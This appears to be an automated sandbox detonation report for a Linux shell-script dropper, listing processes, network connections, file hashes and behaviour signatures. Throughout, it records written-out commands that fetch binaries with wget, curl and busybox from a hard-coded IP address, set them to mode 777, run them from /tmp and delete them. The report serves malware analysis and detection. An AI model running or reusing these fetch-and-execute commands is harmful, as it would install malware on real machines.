[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 03:39

Reported

2024-11-20 03:42

Platform

debian9-mipsel-20240418-en

Max time kernel

109s

Max time network

111s

Command Line

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A

Processes

/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

